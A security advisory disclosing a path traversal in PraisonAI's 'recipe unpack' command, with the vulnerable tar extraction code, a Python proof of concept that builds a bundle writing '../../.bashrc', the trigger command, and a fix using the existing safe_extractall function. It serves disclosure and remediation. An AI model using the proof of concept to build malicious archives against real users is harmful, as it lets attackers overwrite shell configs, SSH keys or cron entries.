PT-2026-53546 · Pypi · Praisonai
Publicado
2026-06-29
·
Atualizado
2026-06-29
CVSS v4.0
9.4
Crítica
| Vetor | AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H |
| Field | Value |
|---|---|
| Severity | Critical |
| Type | Path traversal -- arbitrary file write via tar.extract() without member validation |
| Affected | src/praisonai/praisonai/cli/features/recipe.py:1170-1172 |
Summary
cmd unpack in the recipe CLI extracts .praison tar archives using raw tar.extract() without validating archive member paths. A .praison bundle containing ../../ entries will write files outside the intended output directory. An attacker who distributes a malicious bundle can overwrite arbitrary files on the victim's filesystem when they run praisonai recipe unpack.Details
The vulnerable code is in
cli/features/recipe.py:1170-1172:python
for member in tar.getmembers():
if member.name != "manifest.json":
tar.extract(member, recipe dir)The only check is whether the member is
manifest.json. The code never validates member names -- absolute paths, .. components, and symlinks all pass through. Python's tarfile.extract() resolves these relative to the destination, so a member named ../../.bashrc lands two directories above recipe dir.The codebase does contain a safe extraction function (
safe extractall in recipe/registry.py:131-162) that rejects absolute paths, .. segments, and resolved paths outside the destination. It is used by the pull and publish paths, but cmd unpack does not call it.python
# recipe/registry.py:141-159 -- safe version exists but is not used by cmd unpack
def safe extractall(tar: tarfile.TarFile, dest dir: Path) -> None:
dest = str(dest dir.resolve())
for member in tar.getmembers():
if os.path.isabs(member.name):
raise RegistryError(...)
if ".." in member.name.split("/"):
raise RegistryError(...)
resolved = os.path.realpath(os.path.join(dest, member.name))
if not resolved.startswith(dest + os.sep):
raise RegistryError(...)
tar.extractall(dest dir)PoC
Build a malicious bundle:
python
import tarfile, io, json
manifest = json.dumps({"name": "legit-recipe", "version": "1.0.0"}).encode()
with tarfile.open("malicious.praison", "w:gz") as tar:
info = tarfile.TarInfo(name="manifest.json")
info.size = len(manifest)
tar.addfile(info, io.BytesIO(manifest))
payload = b"export EVIL=1 # injected by malicious recipe
"
evil = tarfile.TarInfo(name="../../.bashrc")
evil.size = len(payload)
tar.addfile(evil, io.BytesIO(payload))Trigger:
bash
praisonai recipe unpack malicious.praison -o ./recipes
# Expected: files written only under ./recipes/legit-recipe/
# Actual: .bashrc written two directories above the output dirImpact
| Path | Traversal blocked? |
|---|---|
praisonai recipe pull <name> | Yes -- uses safe extractall |
praisonai recipe publish <bundle> | Yes -- uses safe extractall |
praisonai recipe unpack <bundle> | No -- raw tar.extract() |
An attacker needs to get a victim to unpack a malicious
.praison bundle -- say, through a shared recipe repository, a link in a tutorial, or by sending it to a colleague directly.Depending on filesystem permissions, an attacker can overwrite shell config files (
.bashrc, .zshrc), cron entries, SSH authorized keys, or project files in parent directories. The attacker controls both the path and the content of every written file.Remediation
Replace the raw extraction loop with
safe extractall:python
# cli/features/recipe.py:1170-1172
# Before:
for member in tar.getmembers():
if member.name != "manifest.json":
tar.extract(member, recipe dir)
# After:
from praisonai.recipe.registry import safe extractall
safe extractall(tar, recipe dir)Affected paths
src/praisonai/praisonai/cli/features/recipe.py:1170-1172--cmd unpackextracts tar members without path validation
Correção
Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
Identificadores relacionados
Produtos afetados
Praisonai